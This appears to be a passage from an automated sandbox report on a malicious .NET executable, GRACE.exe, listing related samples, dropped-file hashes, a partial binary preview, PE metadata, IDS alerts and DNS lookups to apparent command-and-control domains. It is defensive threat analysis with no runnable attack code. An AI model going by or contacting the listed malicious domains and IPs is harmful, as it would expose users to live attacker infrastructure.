                                                PO210119.exe.exeGet hashmaliciousBrowse
                                                • 45.196.239.235
                                                synBIAIJ7b.exeGet hashmaliciousBrowse
                                                • 154.95.134.253
                                                1tqW2LLr74.exeGet hashmaliciousBrowse
                                                • 154.83.105.183
                                                ETD101210182 HBL.xlsxGet hashmaliciousBrowse
                                                • 156.232.190.92
                                                NEW AGREEMENT 19 01 2021.xlsxGet hashmaliciousBrowse
                                                • 154.80.226.18
                                                Calendario dei pagamenti.exeGet hashmaliciousBrowse
                                                • 156.245.175.204
                                                SKM_C221200706052800n.exeGet hashmaliciousBrowse
                                                • 154.215.134.40
                                                payment advise.exeGet hashmaliciousBrowse
                                                • 154.86.237.210
                                                Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                • 154.218.85.183
                                                SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                • 154.95.162.109

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSecuriteInfo.com.Trojan.Packed2.42783.32.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                    SlaZL2LqI2.exeGet hashmaliciousBrowse
                                                      4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                        SoPwZKv1Mf.exeGet hashmaliciousBrowse
                                                          bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                            Generator.cont.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                560911_P.EXEGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    IMG_61779.pdf.exeGet hashmaliciousBrowse
                                                                      IMG_5391.EXEGet hashmaliciousBrowse
                                                                        czZ769nM6r.exeGet hashmaliciousBrowse
                                                                          IMG_1107.EXEGet hashmaliciousBrowse
                                                                            r3q6Bv8naR.exeGet hashmaliciousBrowse
                                                                              sy1RnlHl8Y.exeGet hashmaliciousBrowse
                                                                                qyMlTIBawC.exeGet hashmaliciousBrowse
                                                                                  Qn2AQrgfqJ.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.log
                                                                                        Process:C:\Users\user\Desktop\GRACE.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1873
                                                                                        Entropy (8bit):5.355036985457214
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
                                                                                        MD5:CDA95282F22F47DA2FDDC9E912B67FEF
                                                                                        SHA1:67A40582A092B5DF40C3EB61A361A2D336FC69E0
                                                                                        SHA-256:179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
                                                                                        SHA-512:1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
                                                                                        Malicious:true
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Process:C:\Users\user\Desktop\GRACE.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):42080
                                                                                        Entropy (8bit):6.2125074198825105
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                        MD5:F2A47587431C466535F3C3D3427724BE
                                                                                        SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                        SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                        SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: SecuriteInfo.com.Trojan.Packed2.42783.32.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, Detection: malicious, Browse
                                                                                        • Filename: SlaZL2LqI2.exe, Detection: malicious, Browse
                                                                                        • Filename: 4NoiNHCNoU.exe, Detection: malicious, Browse
                                                                                        • Filename: SoPwZKv1Mf.exe, Detection: malicious, Browse
                                                                                        • Filename: bXFjrxjRlb.exe, Detection: malicious, Browse
                                                                                        • Filename: Generator.cont.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: 560911_P.EXE, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: IMG_61779.pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: IMG_5391.EXE, Detection: malicious, Browse
                                                                                        • Filename: czZ769nM6r.exe, Detection: malicious, Browse
                                                                                        • Filename: IMG_1107.EXE, Detection: malicious, Browse
                                                                                        • Filename: r3q6Bv8naR.exe, Detection: malicious, Browse
                                                                                        • Filename: sy1RnlHl8Y.exe, Detection: malicious, Browse
                                                                                        • Filename: qyMlTIBawC.exe, Detection: malicious, Browse
                                                                                        • Filename: Qn2AQrgfqJ.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Trojan.PackedNET.509.28611.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Trojan.PackedNET.509.17348.exe, Detection: malicious, Browse
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.634685476400275
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:GRACE.exe
                                                                                        File size:3215360
                                                                                        MD5:9034acbb2742281523525d715a4ee566
                                                                                        SHA1:605948c4bcd7a0290e46a37d841a09ab43fbec86
                                                                                        SHA256:cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
                                                                                        SHA512:cc2b848101ea9d63fa02a442171fd250f4be76cc9c8d5f6b4c32062436b48931e9b931102c5c392217740cc06661205729f1b2afa7b0dda147c113df3ce454d9
                                                                                        SSDEEP:49152:YTrD4RqOGxx0KVuy+Z28fUANfo8L81ucdopCpC9aXCmczjF10:gD4R5GxxHs8dSQoSucOCpC8Izj/0
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}#....................1.........N#1.. ........@.. ........................1...........`................................

                                                                                        File Icon

                                                                                        Icon Hash:00828e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x71234e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                        Time Stamp:0xF9F237D [Sat Apr 22 10:05:49 1978 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3122fc0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3140000x636.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3160000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x3103540x310400unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x3140000x6360x800False0.35546875data3.70922095564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x3160000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountry
                                                                                        RT_VERSION0x3140a00x3acdata
                                                                                        RT_MANIFEST0x31444c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Version Infos

                                                                                        DescriptionData
                                                                                        Translation0x0000 0x04b0
                                                                                        LegalCopyrightCopyright 2018 >8<2D6?3IB:F?3DB7A>JA9B5
                                                                                        Assembly Version1.0.0.0
                                                                                        InternalNameGRACE.exe
                                                                                        FileVersion9.14.19.23
                                                                                        CompanyName>8<2D6?3IB:F?3DB7A>JA9B5
                                                                                        Comments27J@CII8C76?EJ;
                                                                                        ProductName<>I5?FEA3JEHG6CBH:C44DED
                                                                                        ProductVersion9.14.19.23
                                                                                        FileDescription<>I5?FEA3JEHG6CBH:C44DED
                                                                                        OriginalFilenameGRACE.exe

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        01/27/21-07:59:06.758330ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                        01/27/21-08:00:11.194982ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                        01/27/21-08:01:12.518069TCP1201ATTACK-RESPONSES 403 Forbidden804975423.227.38.74192.168.2.3

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 27, 2021 07:58:44.645333052 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:44.928340912 CET8049739216.250.110.35192.168.2.3
                                                                                        Jan 27, 2021 07:58:44.928457975 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:44.928558111 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:45.210340023 CET8049739216.250.110.35192.168.2.3
                                                                                        Jan 27, 2021 07:58:45.210391998 CET8049739216.250.110.35192.168.2.3
                                                                                        Jan 27, 2021 07:58:45.210418940 CET8049739216.250.110.35192.168.2.3
                                                                                        Jan 27, 2021 07:58:45.210614920 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:45.210660934 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:45.210788965 CET4973980192.168.2.3216.250.110.35
                                                                                        Jan 27, 2021 07:58:45.492578983 CET8049739216.250.110.35192.168.2.3

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 27, 2021 07:57:03.687182903 CET5836153192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:03.736371994 CET53583618.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:04.684554100 CET6349253192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:04.735389948 CET53634928.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:05.631925106 CET6083153192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:05.682622910 CET53608318.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:06.526653051 CET6010053192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:06.577647924 CET53601008.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:07.402307987 CET5319553192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:07.450220108 CET53531958.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:08.477905035 CET5014153192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:08.528554916 CET53501418.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:09.424428940 CET5302353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:09.473896027 CET53530238.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:10.614949942 CET4956353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:10.673142910 CET53495638.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:11.587152004 CET5135253192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:11.635020018 CET53513528.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:11.710526943 CET5934953192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:11.771256924 CET53593498.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:12.465265036 CET5708453192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:12.514309883 CET53570848.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:13.268241882 CET5882353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:13.317176104 CET53588238.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:31.523591042 CET5756853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:31.573447943 CET53575688.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:35.922370911 CET5054053192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:35.983253956 CET53505408.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:39.079822063 CET5436653192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:39.137626886 CET53543668.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:48.028091908 CET5303453192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:48.094542027 CET53530348.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:57:53.722011089 CET5776253192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:57:53.771976948 CET53577628.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:58:09.577709913 CET5543553192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:58:09.628099918 CET53554358.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:58:15.467978954 CET5071353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:58:15.529508114 CET53507138.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:58:44.575615883 CET5613253192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:58:44.639400959 CET53561328.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:58:46.025794983 CET5898753192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:58:46.073719978 CET53589878.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:58:47.430965900 CET5657953192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:58:47.502331972 CET53565798.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:05.447269917 CET6063353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:06.435502052 CET6063353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:06.739923954 CET53606338.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:06.758213997 CET53606338.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:25.173145056 CET6129253192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:25.235316992 CET53612928.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:47.537916899 CET6361953192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:47.611829996 CET53636198.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:53.490791082 CET6493853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:53.547228098 CET53649388.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:54.199328899 CET6194653192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:54.261035919 CET53619468.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:55.497503042 CET6491053192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:55.554064989 CET53649108.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:56.105572939 CET5212353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:56.167295933 CET53521238.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:56.889492035 CET5613053192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:56.950434923 CET53561308.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:57.763669014 CET5633853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:57.819977999 CET53563388.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:58.676543951 CET5942053192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 07:59:58.735301018 CET53594208.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 07:59:59.986825943 CET5878453192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:00.045607090 CET53587848.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:01.559737921 CET6397853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:01.616200924 CET53639788.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:02.453038931 CET6293853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:02.514525890 CET53629388.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:08.715852022 CET5570853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:09.726617098 CET5570853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:10.742414951 CET5570853192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:10.826936007 CET53557088.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:11.194005013 CET53557088.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:30.982753992 CET5680353192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:31.529903889 CET53568038.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:00:51.924572945 CET5714553192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:00:51.993443966 CET53571458.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:01:12.236183882 CET5535953192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:01:12.307245016 CET53553598.8.8.8192.168.2.3
                                                                                        Jan 27, 2021 08:01:32.660002947 CET5830653192.168.2.38.8.8.8
                                                                                        Jan 27, 2021 08:01:32.728943110 CET53583068.8.8.8192.168.2.3

                                                                                        ICMP Packets

                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Jan 27, 2021 07:59:06.758330107 CET192.168.2.38.8.8.8d067(Port unreachable)Destination Unreachable
                                                                                        Jan 27, 2021 08:00:11.194982052 CET192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Jan 27, 2021 07:58:44.575615883 CET192.168.2.38.8.8.80x4d08Standard query (0)www.dl888.netA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:05.447269917 CET192.168.2.38.8.8.80x775aStandard query (0)www.hongreng.xyzA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:06.435502052 CET192.168.2.38.8.8.80x775aStandard query (0)www.hongreng.xyzA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:25.173145056 CET192.168.2.38.8.8.80xfea7Standard query (0)www.hotvidzhub.downloadA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:47.537916899 CET192.168.2.38.8.8.80x6d9Standard query (0)www.kornteengoods.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:08.715852022 CET192.168.2.38.8.8.80xe3baStandard query (0)www.ludisenofloral.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:09.726617098 CET192.168.2.38.8.8.80xe3baStandard query (0)www.ludisenofloral.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:10.742414951 CET192.168.2.38.8.8.80xe3baStandard query (0)www.ludisenofloral.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:30.982753992 CET192.168.2.38.8.8.80xeb0dStandard query (0)www.11sxsx.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:51.924572945 CET192.168.2.38.8.8.80x50aStandard query (0)www.luxusgrotte.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:12.236183882 CET192.168.2.38.8.8.80xd988Standard query (0)www.sterlworldshop.comA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:32.660002947 CET192.168.2.38.8.8.80x7eb8Standard query (0)www.internetmarkaching.comA (IP address)IN (0x0001)

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Jan 27, 2021 07:58:44.639400959 CET8.8.8.8192.168.2.30x4d08No error (0)www.dl888.net216.250.110.35A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:06.739923954 CET8.8.8.8192.168.2.30x775aName error (3)www.hongreng.xyznonenoneA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:06.758213997 CET8.8.8.8192.168.2.30x775aName error (3)www.hongreng.xyznonenoneA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:25.235316992 CET8.8.8.8192.168.2.30xfea7Name error (3)www.hotvidzhub.downloadnonenoneA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 07:59:47.611829996 CET8.8.8.8192.168.2.30x6d9Name error (3)www.kornteengoods.comnonenoneA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:10.826936007 CET8.8.8.8192.168.2.30xe3baServer failure (2)www.ludisenofloral.comnonenoneA (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:11.194005013 CET8.8.8.8192.168.2.30xe3baServer failure (2)www.ludisenofloral.comnonenoneA (IP address)IN (0x0001)
